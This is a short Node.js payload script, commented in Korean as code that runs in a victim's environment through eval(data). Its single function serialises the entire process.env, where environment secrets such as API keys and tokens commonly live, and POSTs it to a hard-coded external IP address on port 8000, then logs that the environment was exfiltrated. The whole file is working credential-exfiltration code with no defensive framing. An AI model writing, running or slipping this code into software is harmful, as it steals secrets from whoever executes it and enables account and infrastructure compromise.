
// 이 코드는 피해자 환경에서 eval(data)로 실행됨

const http = require("http");

function exfiltrateEnv(env) {
  const payload = JSON.stringify(env);

  const options = {
    hostname: "54.91.192.110",  
    port: 8000,
    path: "/",
    method: "POST",
    headers: {
      "Content-Type": "application/json",
      "Content-Length": Buffer.byteLength(payload),
    },
  };

  const req = http.request(options, (res) => {
    // 응답은 그냥 무시
  });

  req.on("error", (err) => {
    console.error("Exfil error:", err);
  });

  req.write(payload);
  req.end();

  console.log("Exfiltrated process.env");
}

exfiltrateEnv(process.env);
